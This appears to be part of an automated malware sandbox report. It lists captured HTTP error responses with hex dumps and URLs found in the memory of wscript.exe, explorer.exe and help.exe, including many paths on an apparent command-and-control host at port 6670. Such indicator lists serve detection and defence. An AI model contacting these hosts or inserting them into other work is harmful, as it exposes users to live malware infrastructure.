Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 17:05:51 GMTServer: Apache/2.4.53 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 27 May 2022 17:06:06 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 17:06:50 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 27 May 2022 17:07:19 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 17:07:42 GMTServer: Apache/2.4.53 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 17:07:42 GMTServer: Apache/2.4.53 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 17:07:42 GMTServer: Apache/2.4.53 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: help.exe, 00000009.00000002.930456498.0000000003752000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://c.statcounter.com/9484561/0/b0cbab70/1/
Source: wscript.exe, 00000001.00000003.500327144.00000221822C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.500552314.00000221822C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro/
Source: wscript.exe, 00000008.00000002.921930970.0000020FBC219000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6
Source: wscript.exe, 00000008.00000003.465086435.0000020FBE075000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.921864833.0000020FBC1DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/
Source: wscript.exe, 00000004.00000003.422334361.0000014D0B238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/7DQoJ
Source: wscript.exe, 00000001.00000003.393713330.0000022181D33000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922422358.0000026A515A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.464499048.0000020FBE023000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/UZXh0
Source: wscript.exe, 00000008.00000002.931463761.0000020FBE1F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.899394436.0000020FBE9E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre
Source: wscript.exe, 00000004.00000003.550023960.0000014D0BBC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.549886529.0000014D0BB83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.549931938.0000014D0BBA8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.549990905.0000014D0BBAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922245299.0000026A4F84B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre02-00600806D9B6
Source: wscript.exe, 00000001.00000002.907994191.0000022182230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre3
Source: wscript.exe, 00000001.00000003.842626343.00000221FFF32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.842357341.00000221FFF28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.908099402.0000022182291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.676181924.00000221822E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.842125955.00000221FFF25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.676740678.00000221822E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.842440837.00000221FFF2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.676124396.00000221822C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.694593679.0000014D0BB9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.694902481.0000014D0BBA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.694746838.0000014D0BBE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.923829675.0000014D09619000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.856325867.0000014D0BBA8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.694522352.0000014D0BBDB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.856253293.0000014D0BBA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.694954010.0000014D0BBA8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.716231469.0000026A51A00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.716617142.0000026A51A22000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.716721287.0000026A51A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.879090249.0000026A51A3C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.716693053.0000026A51A25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre63209-4053062332-100
Source: wscript.exe, 00000007.00000003.882649285.0000026A5198D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.926117959.0000026A51983000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre8
Source: wscript.exe, 00000004.00000003.694438767.0000014D0BC10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre=
Source: wscript.exe, 00000008.00000002.931546751.0000020FBE910000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreA%
Source: wscript.exe, 00000004.00000002.927952300.0000014D0B430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922532609.0000026A517B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.931463761.0000020FBE1F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreCXRyeSB7
Source: wscript.exe, 00000004.00000003.694438767.0000014D0BC10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.716472750.0000026A519DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreH
Source: wscript.exe, 00000001.00000002.907949646.0000022181F70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreKTsNClZO
Source: wscript.exe, 00000007.00000002.926213528.0000026A519F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreL
Source: wscript.exe, 00000008.00000003.900095109.0000020FBC1FE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.931463761.0000020FBE1F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreM
Source: wscript.exe, 00000007.00000003.882772134.0000026A519DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreM%
Source: wscript.exe, 00000001.00000002.907994191.0000022182230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreM7d
Source: wscript.exe, 00000004.00000002.928057135.0000014D0BB43000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreMP
Source: wscript.exe, 00000004.00000002.923787188.0000014D095D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreMV3
Source: wscript.exe, 00000004.00000002.927952300.0000014D0B430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922532609.0000026A517B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.931463761.0000020FBE1F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreMjdcXHZi
Source: wscript.exe, 00000001.00000002.907994191.0000022182230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreN_5
Source: wscript.exe, 00000004.00000002.927952300.0000014D0B430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922532609.0000026A517B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.883116107.0000026A519F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.882795550.0000026A519F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.926213528.0000026A519F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.931463761.0000020FBE1F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreP
Source: wscript.exe, 00000001.00000002.907949646.0000022181F70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrePSAiQ2wi
Source: wscript.exe, 00000004.00000002.927952300.0000014D0B430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922532609.0000026A517B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.931463761.0000020FBE1F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrePSAiUkYirr
Source: wscript.exe, 00000001.00000003.500806397.00000221822B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreR
Source: wscript.exe, 00000004.00000002.927952300.0000014D0B430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922532609.0000026A517B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreSE
Source: wscript.exe, 00000008.00000002.931688927.0000020FBE9A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreT
Source: wscript.exe, 00000007.00000002.926213528.0000026A519F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreU
Source: wscript.exe, 00000008.00000002.931546751.0000020FBE910000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.900141906.0000020FBE9CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.899755081.0000020FBE9CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.899013643.0000020FBE9CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreX
Source: wscript.exe, 00000004.00000003.549967536.0000014D0BB98000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.549886529.0000014D0BB83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.550053637.0000014D0BBA4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZ
Source: wscript.exe, 00000004.00000002.923787188.0000014D095D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZ3
Source: wscript.exe, 00000001.00000002.907949646.0000022181F70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZXBsYWNl
Source: wscript.exe, 00000001.00000002.907949646.0000022181F70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZigpIHsNrr
Source: wscript.exe, 00000007.00000002.926213528.0000026A519F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre_
Source: wscript.exe, 00000004.00000002.923787188.0000014D095D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre_3
Source: wscript.exe, 00000001.00000002.907949646.0000022181F70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.927952300.0000014D0B430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922532609.0000026A517B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.931463761.0000020FBE1F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.d
Source: wscript.exe, 00000001.00000002.907949646.0000022181F70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.927952300.0000014D0B430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922532609.0000026A517B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.931463761.0000020FBE1F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.duu
Source: wscript.exe, 00000004.00000002.927952300.0000014D0B430000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreageen-usWScript.Quit
Source: wscript.exe, 00000001.00000002.907949646.0000022181F70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreagent
Source: wscript.exe, 00000001.00000002.907949646.0000022181F70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrebWcgPSAi
Source: wscript.exe, 00000007.00000003.712817574.0000026A51A68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.715157117.0000026A51A76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vred
Source: wscript.exe, 00000008.00000003.900095109.0000020FBC1FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vree5
Source: wscript.exe, 00000004.00000003.856306229.0000014D09618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.923829675.0000014D09619000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.856018429.0000014D0960A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.855935009.0000014D09600000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreecuritycenter7
Source: wscript.exe, 00000007.00000002.922326377.0000026A4F8C8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.882416332.0000026A4F8DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreecuritycenterre
Source: wscript.exe, 00000004.00000003.694593679.0000014D0BB9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.694902481.0000014D0BBA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreem
Source: wscript.exe, 00000001.00000002.908396849.00000221FFEFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.915088147.0000020FBC148000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreineer
Source: wscript.exe, 00000007.00000002.926172327.0000026A519DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrej
Source: wscript.exe, 00000004.00000002.927952300.0000014D0B430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922532609.0000026A517B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.931463761.0000020FBE1F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrek7
Source: wscript.exe, 00000004.00000002.928037378.0000014D0BB20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vren
Source: wscript.exe, 00000001.00000002.908396849.00000221FFEFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.907994191.0000022182230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.928057135.0000014D0BB43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.928037378.0000014D0BB20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.926172327.0000026A519DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.736038236.0000020FBC216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreo
Source: wscript.exe, 00000007.00000003.716472750.0000026A519DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreo&
Source: wscript.exe, 00000008.00000002.931546751.0000020FBE910000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreo=
Source: wscript.exe, 00000004.00000003.695080046.0000014D095FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreod
Source: wscript.exe, 00000001.00000002.907949646.0000022181F70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.927952300.0000014D0B430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.922532609.0000026A517B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.931463761.0000020FBE1F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vres2
Source: wscript.exe, 00000001.00000003.500806397.00000221822B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vret
Source: wscript.exe, 00000004.00000002.928127733.0000014D0BBA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrewz
Source: wscript.exe, 00000004.00000003.549967536.0000014D0BB98000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.549886529.0000014D0BB83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.550053637.0000014D0BBA4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrezjB
Source: wscript.exe, 00000001.00000002.908343152.00000221FFEBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6ecuritycenter2=
Source: explorer.exe, 00000003.00000000.451561287.0000000008308000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.428859791.0000000008308000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.482629137.0000000008308000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.mi
Source: help.exe, 00000009.00000002.930456498.0000000003752000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://statcounter.com/
Source: explorer.exe, 00000003.00000000.482326473.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.428747100.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.451429720.0000000008277000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: help.exe, 00000009.00000002.934078297.0000000003DCB000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.gabefancher.com
Source: help.exe, 00000009.00000002.934078297.0000000003DCB000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.gabefancher.com/np8s/
Source: explorer.exe, 00000003.00000000.482326473.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.428747100.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.451429720.0000000008277000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000003.00000000.482326473.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.428747100.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.451429720.0000000008277000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 00000003.00000000.430092950.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
Source: explorer.exe, 00000003.00000000.450826772.00000000080FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.430092950.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
